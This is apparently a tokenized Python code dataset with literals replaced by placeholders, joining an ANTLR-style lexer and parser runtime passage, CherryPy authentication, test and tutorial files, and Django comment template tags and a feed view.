<NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> mre = MismatchedRangeException ( unichr ( a ) , unichr ( b ) , self . input ) <EOL> self . recover ( mre ) <EOL> raise mre <EOL> self . input . consume ( ) <EOL> def getLine ( self ) : <EOL> return self . input . line <EOL> def getCharPositionInLine ( self ) : <EOL> return self . input . charPositionInLine <EOL> def getCharIndex ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . input . index ( ) <EOL> def getText ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _state . text is not None : <EOL> return self . _state . text <EOL> return self . input . substring ( <EOL> self . _state . tokenStartCharIndex , <EOL> self . 
getCharIndex ( ) - <NUM_LIT:1> <EOL> ) <EOL> def setText ( self , text ) : <EOL> """<STR_LIT>""" <EOL> self . _state . text = text <EOL> text = property ( getText , setText ) <EOL> def reportError ( self , e ) : <EOL> self . displayRecognitionError ( self . tokenNames , e ) <EOL> def getErrorMessage ( self , e , tokenNames ) : <EOL> msg = None <EOL> if isinstance ( e , MismatchedTokenException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + self . getCharErrorDisplay ( e . expecting ) <EOL> elif isinstance ( e , NoViableAltException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) <EOL> elif isinstance ( e , EarlyExitException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) <EOL> elif isinstance ( e , MismatchedNotSetException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , MismatchedSetException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , MismatchedRangeException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + self . getCharErrorDisplay ( e . a ) + "<STR_LIT:..>" + self . getCharErrorDisplay ( e . b ) <EOL> else : <EOL> msg = BaseRecognizer . getErrorMessage ( self , e , tokenNames ) <EOL> return msg <EOL> def getCharErrorDisplay ( self , c ) : <EOL> if c == EOF : <EOL> c = '<STR_LIT>' <EOL> return repr ( c ) <EOL> def recover ( self , re ) : <EOL> """<STR_LIT>""" <EOL> self . input . consume ( ) <EOL> def traceIn ( self , ruleName , ruleIndex ) : <EOL> inputSymbol = "<STR_LIT>" % ( self . input . LT ( <NUM_LIT:1> ) , <EOL> self . getLine ( ) , <EOL> self . getCharPositionInLine ( ) <EOL> ) <EOL> BaseRecognizer . traceIn ( self , ruleName , ruleIndex , inputSymbol ) <EOL> def traceOut ( self , ruleName , ruleIndex ) : <EOL> inputSymbol = "<STR_LIT>" % ( self . input . 
LT ( <NUM_LIT:1> ) , <EOL> self . getLine ( ) , <EOL> self . getCharPositionInLine ( ) <EOL> ) <EOL> BaseRecognizer . traceOut ( self , ruleName , ruleIndex , inputSymbol ) <EOL> class Parser ( BaseRecognizer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , lexer , state = None ) : <EOL> BaseRecognizer . __init__ ( self , state ) <EOL> self . setTokenStream ( lexer ) <EOL> def reset ( self ) : <EOL> BaseRecognizer . reset ( self ) <EOL> if self . input is not None : <EOL> self . input . seek ( <NUM_LIT:0> ) <EOL> def getCurrentInputSymbol ( self , input ) : <EOL> return input . LT ( <NUM_LIT:1> ) <EOL> def getMissingSymbol ( self , input , e , expectedTokenType , follow ) : <EOL> if expectedTokenType == EOF : <EOL> tokenText = "<STR_LIT>" <EOL> else : <EOL> tokenText = "<STR_LIT>" + self . tokenNames [ expectedTokenType ] + "<STR_LIT:>>" <EOL> t = CommonToken ( type = expectedTokenType , text = tokenText ) <EOL> current = input . LT ( <NUM_LIT:1> ) <EOL> if current . type == EOF : <EOL> current = input . LT ( - <NUM_LIT:1> ) <EOL> if current is not None : <EOL> t . line = current . line <EOL> t . charPositionInLine = current . charPositionInLine <EOL> t . channel = DEFAULT_CHANNEL <EOL> return t <EOL> def setTokenStream ( self , input ) : <EOL> """<STR_LIT>""" <EOL> self . input = None <EOL> self . reset ( ) <EOL> self . input = input <EOL> def getTokenStream ( self ) : <EOL> return self . input <EOL> def getSourceName ( self ) : <EOL> return self . input . getSourceName ( ) <EOL> def traceIn ( self , ruleName , ruleIndex ) : <EOL> BaseRecognizer . traceIn ( self , ruleName , ruleIndex , self . input . LT ( <NUM_LIT:1> ) ) <EOL> def traceOut ( self , ruleName , ruleIndex ) : <EOL> BaseRecognizer . traceOut ( self , ruleName , ruleIndex , self . input . 
LT ( <NUM_LIT:1> ) ) <EOL> class RuleReturnScope ( object ) : <EOL> """<STR_LIT>""" <EOL> def getStart ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getStop ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getTree ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getTemplate ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> class ParserRuleReturnScope ( RuleReturnScope ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . start = None <EOL> self . stop = None <EOL> def getStart ( self ) : <EOL> return self . start <EOL> def getStop ( self ) : <EOL> return self . stop </s>
<s> import cherrypy <EOL> from cherrypy . lib import httpauth <EOL> def check_auth ( users , encrypt = None , realm = None ) : <EOL> """<STR_LIT>""" <EOL> request = cherrypy . serving . request <EOL> if '<STR_LIT>' in request . headers : <EOL> ah = httpauth . parseAuthorization ( request . headers [ '<STR_LIT>' ] ) <EOL> if ah is None : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> if not encrypt : <EOL> encrypt = httpauth . DIGEST_AUTH_ENCODERS [ httpauth . MD5 ] <EOL> if hasattr ( users , '<STR_LIT>' ) : <EOL> try : <EOL> users = users ( ) <EOL> if not isinstance ( users , dict ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> password = users . get ( ah [ "<STR_LIT:username>" ] , None ) <EOL> except TypeError : <EOL> password = users ( ah [ "<STR_LIT:username>" ] ) <EOL> else : <EOL> if not isinstance ( users , dict ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> password = users . get ( ah [ "<STR_LIT:username>" ] , None ) <EOL> if httpauth . checkResponse ( ah , password , method = request . method , <EOL> encrypt = encrypt , realm = realm ) : <EOL> request . login = ah [ "<STR_LIT:username>" ] <EOL> return True <EOL> request . login = False <EOL> return False <EOL> def basic_auth ( realm , users , encrypt = None , debug = False ) : <EOL> """<STR_LIT>""" <EOL> if check_auth ( users , encrypt ) : <EOL> if debug : <EOL> cherrypy . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return <EOL> cherrypy . serving . response . headers [ '<STR_LIT>' ] = httpauth . basicAuth ( realm ) <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> def digest_auth ( realm , users , debug = False ) : <EOL> """<STR_LIT>""" <EOL> if check_auth ( users , realm = realm ) : <EOL> if debug : <EOL> cherrypy . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return <EOL> cherrypy . serving . response . headers [ '<STR_LIT>' ] = httpauth . digestAuth ( realm ) <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , "<STR_LIT>" ) </s>
<s> import os <EOL> import sys <EOL> import time <EOL> starttime = time . time ( ) <EOL> import cherrypy <EOL> class Root : <EOL> def index ( self ) : <EOL> return "<STR_LIT>" <EOL> index . exposed = True <EOL> def mtimes ( self ) : <EOL> return repr ( cherrypy . engine . publish ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> mtimes . exposed = True <EOL> def pid ( self ) : <EOL> return str ( os . getpid ( ) ) <EOL> pid . exposed = True <EOL> def start ( self ) : <EOL> return repr ( starttime ) <EOL> start . exposed = True <EOL> def exit ( self ) : <EOL> cherrypy . engine . wait ( state = cherrypy . engine . states . STARTED ) <EOL> cherrypy . engine . exit ( ) <EOL> exit . exposed = True <EOL> def unsub_sig ( ) : <EOL> cherrypy . log ( "<STR_LIT>" % cherrypy . config . get ( '<STR_LIT>' , False ) ) <EOL> if cherrypy . config . get ( '<STR_LIT>' , False ) : <EOL> cherrypy . log ( "<STR_LIT>" ) <EOL> cherrypy . engine . signal_handler . unsubscribe ( ) <EOL> try : <EOL> from signal import signal , SIGTERM <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> def old_term_handler ( signum = None , frame = None ) : <EOL> cherrypy . log ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> cherrypy . log ( "<STR_LIT>" ) <EOL> signal ( SIGTERM , old_term_handler ) <EOL> cherrypy . engine . subscribe ( '<STR_LIT:start>' , unsub_sig , priority = <NUM_LIT:100> ) <EOL> def starterror ( ) : <EOL> if cherrypy . config . get ( '<STR_LIT>' , False ) : <EOL> zerodiv = <NUM_LIT:1> / <NUM_LIT:0> <EOL> cherrypy . engine . subscribe ( '<STR_LIT:start>' , starterror , priority = <NUM_LIT:6> ) <EOL> def log_test_case_name ( ) : <EOL> if cherrypy . config . get ( '<STR_LIT>' , False ) : <EOL> cherrypy . log ( "<STR_LIT>" % cherrypy . config . get ( '<STR_LIT>' ) ) <EOL> cherrypy . engine . subscribe ( '<STR_LIT:start>' , log_test_case_name , priority = <NUM_LIT:6> ) <EOL> cherrypy . tree . mount ( Root ( ) , '<STR_LIT:/>' , { '<STR_LIT:/>' : { } } ) </s>
<s> """<STR_LIT>""" <EOL> import cherrypy <EOL> from cherrypy . _cpcompat import ntob , ntou , sorted <EOL> def setup_server ( ) : <EOL> class Root : <EOL> def multipart ( self , parts ) : <EOL> return repr ( parts ) <EOL> multipart . exposed = True <EOL> def multipart_form_data ( self , ** kwargs ) : <EOL> return repr ( list ( sorted ( kwargs . items ( ) ) ) ) <EOL> multipart_form_data . exposed = True <EOL> def flashupload ( self , Filedata , Upload , Filename ) : <EOL> return ( "<STR_LIT>" % <EOL> ( Upload , Filename , Filedata . file . read ( ) ) ) <EOL> flashupload . exposed = True <EOL> cherrypy . config . update ( { '<STR_LIT>' : <NUM_LIT:0> } ) <EOL> cherrypy . tree . mount ( Root ( ) ) <EOL> from cherrypy . test import helper <EOL> class MultipartTest ( helper . CPWebCase ) : <EOL> setup_server = staticmethod ( setup_server ) <EOL> def test_multipart ( self ) : <EOL> text_part = ntou ( "<STR_LIT>" ) <EOL> html_part = ntou ( """<STR_LIT>""" ) <EOL> body = '<STR_LIT:\r\n>' . join ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> text_part , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> html_part , <EOL> "<STR_LIT>" ] ) <EOL> headers = [ <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , str ( len ( body ) ) ) , <EOL> ] <EOL> self . getPage ( '<STR_LIT>' , headers , "<STR_LIT:POST>" , body ) <EOL> self . assertBody ( repr ( [ text_part , html_part ] ) ) <EOL> def test_multipart_form_data ( self ) : <EOL> body = '<STR_LIT:\r\n>' . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . 
getPage ( '<STR_LIT>' , method = '<STR_LIT:POST>' , <EOL> headers = [ ( "<STR_LIT:Content-Type>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , str ( len ( body ) ) ) , <EOL> ] , <EOL> body = body ) , <EOL> self . assertBody ( repr ( [ ( '<STR_LIT>' , [ ntou ( '<STR_LIT>' ) , ntou ( '<STR_LIT>' ) ] ) , ( '<STR_LIT:foo>' , ntou ( '<STR_LIT:bar>' ) ) ] ) ) <EOL> class SafeMultipartHandlingTest ( helper . CPWebCase ) : <EOL> setup_server = staticmethod ( setup_server ) <EOL> def test_Flash_Upload ( self ) : <EOL> headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> filedata = ntob ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = ( ntob ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\r\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\r\n>' ) <EOL> + filedata + <EOL> ntob ( '<STR_LIT:\r\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\r\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) ) <EOL> self . getPage ( '<STR_LIT>' , headers , "<STR_LIT:POST>" , body ) <EOL> self . assertBody ( "<STR_LIT>" <EOL> "<STR_LIT>" % filedata ) </s>
<s> """<STR_LIT>""" <EOL> import cherrypy <EOL> class GeneratorDemo : <EOL> def header ( self ) : <EOL> return "<STR_LIT>" <EOL> def footer ( self ) : <EOL> return "<STR_LIT>" <EOL> def index ( self ) : <EOL> users = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> yield self . header ( ) <EOL> yield "<STR_LIT>" <EOL> for user in users : <EOL> yield "<STR_LIT>" % user <EOL> yield self . footer ( ) <EOL> index . exposed = True <EOL> import os . path <EOL> tutconf = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> cherrypy . quickstart ( GeneratorDemo ( ) , config = tutconf ) <EOL> else : <EOL> cherrypy . tree . mount ( GeneratorDemo ( ) , config = tutconf ) </s>
<s> from django . conf . urls . defaults import * <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> from django . contrib . comments . models import Comment , FreeComment <EOL> from django . contrib . comments . models import PHOTOS_REQUIRED , PHOTOS_OPTIONAL , RATINGS_REQUIRED , RATINGS_OPTIONAL , IS_PUBLIC <EOL> from django . contrib . comments . models import MIN_PHOTO_DIMENSION , MAX_PHOTO_DIMENSION <EOL> from django import template <EOL> from django . template import loader <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . contrib . contenttypes . models import ContentType <EOL> import re <EOL> register = template . Library ( ) <EOL> COMMENT_FORM = '<STR_LIT>' <EOL> FREE_COMMENT_FORM = '<STR_LIT>' <EOL> class CommentFormNode ( template . Node ) : <EOL> def __init__ ( self , content_type , obj_id_lookup_var , obj_id , free , <EOL> photos_optional = False , photos_required = False , photo_options = '<STR_LIT>' , <EOL> ratings_optional = False , ratings_required = False , rating_options = '<STR_LIT>' , <EOL> is_public = True ) : <EOL> self . content_type = content_type <EOL> self . obj_id_lookup_var , self . obj_id , self . free = obj_id_lookup_var , obj_id , free <EOL> self . photos_optional , self . photos_required = photos_optional , photos_required <EOL> self . ratings_optional , self . ratings_required = ratings_optional , ratings_required <EOL> self . photo_options , self . rating_options = photo_options , rating_options <EOL> self . is_public = is_public <EOL> def render ( self , context ) : <EOL> from django . utils . text import normalize_newlines <EOL> import base64 <EOL> context . push ( ) <EOL> if self . obj_id_lookup_var is not None : <EOL> try : <EOL> self . obj_id = template . resolve_variable ( self . obj_id_lookup_var , context ) <EOL> except template . VariableDoesNotExist : <EOL> return '<STR_LIT>' <EOL> try : <EOL> self . content_type . get_object_for_this_type ( pk = self . 
obj_id ) <EOL> except ObjectDoesNotExist : <EOL> context [ '<STR_LIT>' ] = False <EOL> else : <EOL> context [ '<STR_LIT>' ] = True <EOL> else : <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT:target>' ] = '<STR_LIT>' % ( self . content_type . id , self . obj_id ) <EOL> options = [ ] <EOL> for var , abbr in ( ( '<STR_LIT>' , PHOTOS_REQUIRED ) , <EOL> ( '<STR_LIT>' , PHOTOS_OPTIONAL ) , <EOL> ( '<STR_LIT>' , RATINGS_REQUIRED ) , <EOL> ( '<STR_LIT>' , RATINGS_OPTIONAL ) , <EOL> ( '<STR_LIT>' , IS_PUBLIC ) ) : <EOL> context [ var ] = getattr ( self , var ) <EOL> if getattr ( self , var ) : <EOL> options . append ( abbr ) <EOL> context [ '<STR_LIT>' ] = '<STR_LIT:U+002C>' . join ( options ) <EOL> if self . free : <EOL> context [ '<STR_LIT>' ] = Comment . objects . get_security_hash ( context [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' , context [ '<STR_LIT:target>' ] ) <EOL> default_form = loader . get_template ( FREE_COMMENT_FORM ) <EOL> else : <EOL> context [ '<STR_LIT>' ] = self . photo_options <EOL> context [ '<STR_LIT>' ] = normalize_newlines ( base64 . encodestring ( self . rating_options ) . strip ( ) ) <EOL> if self . rating_options : <EOL> context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] = Comment . objects . get_rating_options ( self . rating_options ) <EOL> context [ '<STR_LIT>' ] = Comment . objects . get_security_hash ( context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] , context [ '<STR_LIT:target>' ] ) <EOL> default_form = loader . get_template ( COMMENT_FORM ) <EOL> output = default_form . render ( context ) <EOL> context . pop ( ) <EOL> return output <EOL> class CommentCountNode ( template . Node ) : <EOL> def __init__ ( self , package , module , context_var_name , obj_id , var_name , free ) : <EOL> self . package , self . module = package , module <EOL> self . context_var_name , self . obj_id = context_var_name , obj_id <EOL> self . var_name , self . 
free = var_name , free <EOL> def render ( self , context ) : <EOL> from django . conf import settings <EOL> manager = self . free and FreeComment . objects or Comment . objects <EOL> if self . context_var_name is not None : <EOL> self . obj_id = template . resolve_variable ( self . context_var_name , context ) <EOL> comment_count = manager . filter ( object_id__exact = self . obj_id , <EOL> content_type__app_label__exact = self . package , <EOL> content_type__model__exact = self . module , site__id__exact = settings . SITE_ID ) . count ( ) <EOL> context [ self . var_name ] = comment_count <EOL> return '<STR_LIT>' <EOL> class CommentListNode ( template . Node ) : <EOL> def __init__ ( self , package , module , context_var_name , obj_id , var_name , free , ordering , extra_kwargs = None ) : <EOL> self . package , self . module = package , module <EOL> self . context_var_name , self . obj_id = context_var_name , obj_id <EOL> self . var_name , self . free = var_name , free <EOL> self . ordering = ordering <EOL> self . extra_kwargs = extra_kwargs or { } <EOL> def render ( self , context ) : <EOL> from django . conf import settings <EOL> get_list_function = self . free and FreeComment . objects . filter or Comment . objects . get_list_with_karma <EOL> if self . context_var_name is not None : <EOL> try : <EOL> self . obj_id = template . resolve_variable ( self . context_var_name , context ) <EOL> except template . VariableDoesNotExist : <EOL> return '<STR_LIT>' <EOL> kwargs = { <EOL> '<STR_LIT>' : self . obj_id , <EOL> '<STR_LIT>' : self . package , <EOL> '<STR_LIT>' : self . module , <EOL> '<STR_LIT>' : settings . SITE_ID , <EOL> } <EOL> kwargs . update ( self . extra_kwargs ) <EOL> if not self . free and settings . COMMENTS_BANNED_USERS_GROUP : <EOL> kwargs [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' % settings . COMMENTS_BANNED_USERS_GROUP } <EOL> comment_list = get_list_function ( ** kwargs ) . order_by ( self . ordering + '<STR_LIT>' ) . 
select_related ( ) <EOL> if not self . free : <EOL> if context . has_key ( '<STR_LIT:user>' ) and context [ '<STR_LIT:user>' ] . is_authenticated ( ) : <EOL> user_id = context [ '<STR_LIT:user>' ] . id <EOL> context [ '<STR_LIT>' ] = Comment . objects . user_is_moderator ( context [ '<STR_LIT:user>' ] ) <EOL> else : <EOL> user_id = None <EOL> context [ '<STR_LIT>' ] = False <EOL> if settings . COMMENTS_BANNED_USERS_GROUP : <EOL> comment_list = [ c for c in comment_list if not c . is_hidden or ( user_id == c . user_id ) ] <EOL> context [ self . var_name ] = comment_list <EOL> return '<STR_LIT>' <EOL> class DoCommentForm : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , free ) : <EOL> self . free = free <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) < <NUM_LIT:4> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if tokens [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> package , module = tokens [ <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> content_type = ContentType . objects . get ( app_label__exact = package , model__exact = module ) <EOL> except ContentType . DoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , package , module ) <EOL> obj_id_lookup_var , obj_id = None , None <EOL> if tokens [ <NUM_LIT:3> ] . isdigit ( ) : <EOL> obj_id = tokens [ <NUM_LIT:3> ] <EOL> try : <EOL> content_type . get_object_for_this_type ( pk = obj_id ) <EOL> except ObjectDoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , content_type . 
name , obj_id ) <EOL> else : <EOL> obj_id_lookup_var = tokens [ <NUM_LIT:3> ] <EOL> kwargs = { } <EOL> if len ( tokens ) > <NUM_LIT:4> : <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> for option , args in zip ( tokens [ <NUM_LIT:5> : : <NUM_LIT:2> ] , tokens [ <NUM_LIT:6> : : <NUM_LIT:2> ] ) : <EOL> if option in ( '<STR_LIT>' , '<STR_LIT>' ) and not self . free : <EOL> option_list = args . split ( '<STR_LIT:U+002C>' ) <EOL> if len ( option_list ) % <NUM_LIT:3> != <NUM_LIT:0> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> for opt in option_list [ : : <NUM_LIT:3> ] : <EOL> if not opt . isalnum ( ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , opt ) <EOL> for opt in option_list [ <NUM_LIT:1> : : <NUM_LIT:3> ] + option_list [ <NUM_LIT:2> : : <NUM_LIT:3> ] : <EOL> if not opt . isdigit ( ) or not ( MIN_PHOTO_DIMENSION <= int ( opt ) <= MAX_PHOTO_DIMENSION ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , opt , MIN_PHOTO_DIMENSION , MAX_PHOTO_DIMENSION ) <EOL> kwargs [ option ] = True <EOL> kwargs [ '<STR_LIT>' ] = args <EOL> elif option in ( '<STR_LIT>' , '<STR_LIT>' ) and not self . free : <EOL> if <NUM_LIT:2> < len ( args . split ( '<STR_LIT:|>' ) ) > <NUM_LIT:9> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( option , tokens [ <NUM_LIT:0> ] ) <EOL> if re . match ( '<STR_LIT>' , args . split ( '<STR_LIT:|>' ) [ <NUM_LIT:0> ] ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , option ) <EOL> kwargs [ option ] = True <EOL> kwargs [ '<STR_LIT>' ] = args <EOL> elif option in ( '<STR_LIT>' ) : <EOL> kwargs [ option ] = ( args == '<STR_LIT:true>' ) <EOL> else : <EOL> raise template . 
TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , option ) <EOL> return CommentFormNode ( content_type , obj_id_lookup_var , obj_id , self . free , ** kwargs ) <EOL> class DoCommentCount : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , free ) : <EOL> self . free = free <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) != <NUM_LIT:6> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if tokens [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> package , module = tokens [ <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> content_type = ContentType . objects . get ( app_label__exact = package , model__exact = module ) <EOL> except ContentType . DoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , package , module ) <EOL> var_name , obj_id = None , None <EOL> if tokens [ <NUM_LIT:3> ] . isdigit ( ) : <EOL> obj_id = tokens [ <NUM_LIT:3> ] <EOL> try : <EOL> content_type . get_object_for_this_type ( pk = obj_id ) <EOL> except ObjectDoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , content_type . name , obj_id ) <EOL> else : <EOL> var_name = tokens [ <NUM_LIT:3> ] <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> return CommentCountNode ( package , module , var_name , obj_id , tokens [ <NUM_LIT:5> ] , self . free ) <EOL> class DoGetCommentList : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , free ) : <EOL> self . free = free <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . 
split ( ) <EOL> if not len ( tokens ) in ( <NUM_LIT:6> , <NUM_LIT:7> ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if tokens [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> package , module = tokens [ <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> content_type = ContentType . objects . get ( app_label__exact = package , model__exact = module ) <EOL> except ContentType . DoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , package , module ) <EOL> var_name , obj_id = None , None <EOL> if tokens [ <NUM_LIT:3> ] . isdigit ( ) : <EOL> obj_id = tokens [ <NUM_LIT:3> ] <EOL> try : <EOL> content_type . get_object_for_this_type ( pk = obj_id ) <EOL> except ObjectDoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , content_type . name , obj_id ) <EOL> else : <EOL> var_name = tokens [ <NUM_LIT:3> ] <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if len ( tokens ) == <NUM_LIT:7> : <EOL> if tokens [ <NUM_LIT:6> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> ordering = "<STR_LIT:->" <EOL> else : <EOL> ordering = "<STR_LIT>" <EOL> return CommentListNode ( package , module , var_name , obj_id , tokens [ <NUM_LIT:5> ] , self . free , ordering ) <EOL> register . tag ( '<STR_LIT>' , DoGetCommentList ( False ) ) <EOL> register . tag ( '<STR_LIT>' , DoCommentForm ( False ) ) <EOL> register . tag ( '<STR_LIT>' , DoCommentCount ( False ) ) <EOL> register . tag ( '<STR_LIT>' , DoGetCommentList ( True ) ) <EOL> register . tag ( '<STR_LIT>' , DoCommentForm ( True ) ) <EOL> register . 
tag ( '<STR_LIT>' , DoCommentCount ( True ) ) </s>
<s> from django . contrib . syndication import feeds <EOL> from django . http import HttpResponse , Http404 <EOL> def feed ( request , url , feed_dict = None ) : <EOL> if not feed_dict : <EOL> raise Http404 , "<STR_LIT>" <EOL> try : <EOL> slug , param = url . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> slug , param = url , '<STR_LIT>' <EOL> try : <EOL> f = feed_dict [ slug ] <EOL> except KeyError : <EOL> raise Http404 , "<STR_LIT>" % slug <EOL> try : <EOL> feedgen = f ( slug , request . path ) . get_feed ( param ) <EOL> except feeds . FeedDoesNotExist : <EOL> raise Http404 , "<STR_LIT>" % slug <EOL> response = HttpResponse ( mimetype = feedgen . mime_type ) <EOL> feedgen . write ( response , '<STR_LIT:utf-8>' ) <EOL> return response </s>
<s> from django . template . loader import * </s>
